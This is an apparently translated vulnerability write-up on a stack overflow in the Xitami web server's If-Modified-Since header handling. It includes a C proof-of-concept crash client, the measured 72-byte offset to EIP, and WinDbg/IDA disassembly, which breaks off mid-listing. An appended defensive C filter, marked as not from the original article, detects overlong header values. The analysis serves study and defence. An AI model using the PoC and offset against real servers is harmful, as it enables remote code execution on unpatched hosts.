Xitami If-Modified-Since command vulnerability analysis and exploitation

Source: Internet
Author: User

It has been a long time since I last wrote up a remote overflow vulnerability. This time we start with a simple Xitami overflow; the write-up records the analysis technique for this vulnerability and gives you a simple case to practice on.

Vulnerability Overview
Xitami is a free third-party web server for Windows that provides FTP, HTTP and other services. The main interface of Xitami Web Server is shown in Figure 1.
Xitami has a vulnerability in its handling of the If-Modified-Since header of the HTTP protocol. It is a classic stack overflow. No patch or upgraded version has been released yet.

Vulnerability Analysis
Analysing the vulnerability and locating the key assembly code that causes it is the necessary first step in studying any vulnerability. First we reproduce it. All tests in this article were performed on Windows XP SP2 with Xitami 2.5c2.
Xitami handles the HTTP protocol in xigui32.exe. Open WinDbg, choose "File > Attach to a Process" and select xigui32.exe, then press F5 or issue the "g" command to let it continue running. The test code (PoC) published on the Internet was a Perl script; I rewrote it in C. The main code is as follows:

#include <winsock2.h>
#include <stdio.h>
#include <string.h>
#pragma comment(lib, "ws2_32.lib")

int main(void)
{
    WSADATA wsa;
    SOCKET client;
    struct sockaddr_in server;
    char buf[0x1c0] = {0};
    char header[0x200] = {0};
    char nop[0x60] = {0};
    char host[] = "192.168.1.2"; // server IP address

    WSAStartup(MAKEWORD(2, 2), &wsa);
    client = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

    server.sin_family = AF_INET;
    server.sin_port = htons(80);            // default HTTP service port
    server.sin_addr.s_addr = inet_addr(host);
    connect(client, (LPSOCKADDR)&server, sizeof(server));

    memset(buf, 0x41, 0x100);
    // Fill with 'A' for testing; a real exploit would place the shellcode here
    sprintf(header, "GET / HTTP/1.1\r\nHost: %s\r\nIf-Modified-Since: edevil, %s\r\n\r\n", host, buf);
    send(client, header, 0x1c0, 0);
    // The header data has a length limit, which will be detailed later.

    closesocket(client);
    WSACleanup();
    return 0;
}

Compile and run the code. WinDbg breaks in, as shown in Figure 2.

By filling the buffer with a recognisable pattern and checking which part of it lands in EIP, we determine that the distance from the start of the buffer to EIP is 72 bytes. Set a breakpoint on the accept function with the "bp accept" command and trace from there; the code that causes the vulnerability is as follows.

.text:0041AA20 mov eax, [esp+arg_0]
.text:0041AA24 mov eax, [eax+18h]
.text:0041AA27 mov dword_4B0F7C, eax
.text:0041AA2C cmp word ptr [eax+98h], 0
.text:0041AA34 jz short loc_41AA56 // the condition is true

.text:0041AA56 mov edx, [eax+4Ch] // the "A" data we constructed
.text:0041AA59 push offset s_If-modified-s ; "If-Modified-Since"
.text:0041AA5E add eax, 14h
.text:0041AA61 push edx
.text:0041AA62 push eax
.text:0041AA63 call sub_412A80

.text:00412A80 push ecx
.text:00412A81 push esi
.text:00412A82 mov esi, [esp+8+arg_0]
.text:00412A86 test esi, esi
.text:00412A88 jnz short loc_412A9C // the condition is true

.text:00412A9C mov eax, [esp+8+arg_4]
.text:00412AA0 test eax, eax
.text:00412AA2 jnz short loc_412AB6 // the condition is true

.text:00412AB6 mov eax, [esp+8+arg_8]
.text:00412ABA push eax
.text:00412ABB push esi
.text:00412ABC call sub_40DAE0
.text:00412AC1 mov cl, [eax]
.text:00412AC3 add esp, 8
.text:00412AC6 test cl, cl
.text:00412AC8 jz short loc_412B06
.text:00412ACA lea ecx, [esp+8+var_4]
.text:00412ACE lea edx, [esp+8+arg_0]
.text:00412AD2 push ecx
.text:00412AD3 push edx
.text:00412AD4 push eax
.text:00412AD5 call sub_4444C0

.text:004444C0 sub esp, 5Ch
.text:004444C3 push ebx
.text:004444C4 push ebp
.text:004444C5 push esi
.text:004444C6 push edi
.text:004444C7 mov edi, [esp+6Ch+arg_0]
.text:004444CB xor esi, esi
.text:004444CD cmp edi, esi
.text:004444CF mov [esp+6Ch+var_5C], esi
.text:004444D3 mov [esp+6Ch+var_58], esi
.text:004444D7 mov [esp+6Ch+var_54], esi
.text:004444DB mov [esp+6Ch+var_50], esi
.text:004444DF mov [esp+6Ch+var_4C], esi
.text:004444E3 jnz short loc_4444F7
.text:004444E5 push 124h
.text:004444EA push offset s_CImatixWor_36 ; "C:\iMatix\Work\products\xitami-25\sfl\s"...
.text:004444EF call sub_409A50
.text:004444F4 add esp, 8

.text:004444F7 mov ebp, [esp+6Ch+arg_4]
.text:004444FB cmp ebp, esi
.text:004444FD jnz short loc_444511
.text:004444FF push 125h
.text:00444504 push offset s_CImatixWor_36 ; "C:\iMatix\Work\products\xitami-25\sfl\s"...
.text:00444509 call sub_409A50
.text:0044450E add esp, 8

.text:00444511 mov ebx, [esp+6Ch+arg_8]
.text:00444515 cmp ebx, esi
.text:00444517 jnz short loc_44452B
.text:00444519 push 126h
.text:0044451E push offset s_CImatixWor_36 ; "C:\iMatix\Work\products\xitami-25\sfl\s"...
.text:00444523 call sub_409A50
.text:00444528 add esp, 8

.text:0044452B push 20h ; int
.text:0044452D push edi ; char *
.text:0044452E call _strchr
.text:00444533 mov edi, eax
.text:00444535 add esp, 8
.text:00444538 test edi, edi
.text:0044453A jnz short loc_444547
.text:0044453C pop edi
.text:0044453D pop esi
.text:0044453E pop ebp
.text:0044453F xor ax, ax
.text:00444542 pop ebx
.text:00444543 add esp, 5Ch
.text:00444546 retn

.text:00444547 cmp cchMultiByte, 1
.text:0044454E jle short loc_444560
.text:00444550 movsx eax, byte ptr [edi]
.text:00444553 push 8 ; int
.text:00444555 push eax ; int
.text:00444556 call _isctype
.text:0044455B add esp, 8
.text:0044455E jmp short loc_44456F

.text:00444560 movsx ecx, byte ptr [edi]
.text:00444563
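As an added example (not code from the original article or from Xitami), here is a bounded C check that a front-end filter or test harness can run over the request the PoC above sends: it extracts the If-Modified-Since value, uses the page's measured 72-byte distance to EIP as the hard limit, and splits the value on spaces as the server's strchr(' ') loop does, but with a per-token bound. The MAX_DATE_TOKEN constant and the sample_request helper are assumptions made for illustration; the sample request is constructed to mirror the page's "edevil, " plus 'A' test data.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define MAX_DATE_TOKEN 9  /* longest token in a real HTTP-date: "19:43:31" (assumption) */
#define EIP_OFFSET 72     /* bytes to the saved return address, as measured on the page */

/* Bounded copy of the If-Modified-Since value (the server copies unbounded).
   Returns the value's true length, or -1 when the header is absent. */
static int get_ims_value(const char *req, char *out, size_t outsz)
{
    const char *key = "If-Modified-Since:", *p = strstr(req, key);
    if (!p) return -1;
    for (p += strlen(key); *p == ' '; p++) ;
    const char *end = strstr(p, "\r\n");
    if (!end) end = p + strlen(p);
    size_t len = (size_t)(end - p);
    if (len >= outsz) len = outsz - 1;
    memcpy(out, p, len); out[len] = '\0';
    return (int)(end - p);
}

/* 0 = header absent, 1 = plausible date, 2 = long enough to reach the saved
   return address, 3 = short but not a date (overlong or non-date token). */
int check_if_modified_since(const char *req)
{
    char val[512];
    int len = get_ims_value(req, val, sizeof val);
    if (len < 0) return 0;
    if (len >= EIP_OFFSET) return 2;
    /* Split on spaces like the server's strchr(' ') loop, but with a bound. */
    for (char *tok = strtok(val, " "); tok; tok = strtok(NULL, " ")) {
        if (strlen(tok) > MAX_DATE_TOKEN) return 3;
        for (const char *c = tok; *c; c++)
            if (!isalnum((unsigned char)*c) && !strchr(",:-", *c)) return 3;
    }
    return 1;
}

/* Constructed sample mirroring the page's PoC: "edevil, " followed by n 'A's. */
const char *sample_request(size_t n)
{
    static char req[1024], fill[600];
    if (n >= sizeof fill) n = sizeof fill - 1;
    memset(fill, 'A', n); fill[n] = '\0';
    snprintf(req, sizeof req, "GET / HTTP/1.1\r\nHost: 192.168.1.2\r\n"
             "If-Modified-Since: edevil, %s\r\n\r\n", fill);
    return req;
}
```

A value that is syntactically a date but reaches the 72-byte mark is still reported as 2, because the length check runs before the token check.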
